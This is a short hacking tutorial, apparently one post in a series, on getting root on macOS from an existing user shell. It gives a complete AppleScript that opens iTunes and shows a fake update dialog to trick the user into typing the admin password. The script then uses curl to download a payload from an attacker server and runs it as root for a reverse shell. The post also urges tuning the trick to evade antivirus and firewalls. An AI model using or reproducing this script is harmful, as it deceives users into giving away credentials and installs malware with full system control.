So, now we know how to get a ordinary shell on OSX, what about root ? Luckily for us, we can do a couple of tricks with AppleScript..
You will need a Mac, and a Kali machine for this, so if you have that lined up, go read on :)
So, if you've read the first part Applescript trojan in PDF files, let's move on and write a script to try and trick the user into granting us root privs :)
I assume you have a shell on the system, just a user shell is enough. What we''l write is some Applescript that we can run from a shell, and try to trick the user into granting us system / admin privileges, do download another malware, this time running as root. So, first we need an app for MacOS. Open script editor, and make something like this.
do shell script "open -a itunes.app"\
set DialogText to "Itunes needs to update, Press OK to continue" & "."\
display dialog DialogText
do shell script "curl -s http://PAYLOAD_SERVER/PAYLOAD_FILE >>/tmp/PAYLOAD_FILE;cd /tmp;chmod +x PAYLOAD_FILE;./PAYLOAD_FILE" with administrator privileges
Compile and save as app file, and move it somewhere you can download it, or if you're using some kind of C2, just save it on your workstation.
Then simply, in an ordinary user shell, upload it to target, and run from a Bash shell, using "open -a payload.app".
Then it will open Itunes on the user desktop, tell it needs Itunes to run updates, and promt for admin password. If the user types the password, the script continues with installing the payload as root, giving us a shell back, this time as root.
This can be adjusted endlessly, trying different combinations and social engineering tricks against the user, and of course, try to test it against AntiVirus solutions and firewalls, and adjust as needed.
Remember, this is just a basic example, the rest is up to you, dear reader to try out :)
Much Happy OSX Hacking